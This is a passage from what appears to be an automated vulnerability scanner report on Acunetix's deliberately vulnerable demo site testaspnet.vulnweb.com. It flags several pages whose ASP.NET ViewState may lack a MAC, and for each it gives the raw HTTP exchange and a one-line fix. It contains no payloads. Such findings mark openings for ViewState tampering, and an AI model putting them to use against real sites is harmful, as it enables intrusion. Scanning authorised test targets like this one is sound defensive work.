          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        6. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        7. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
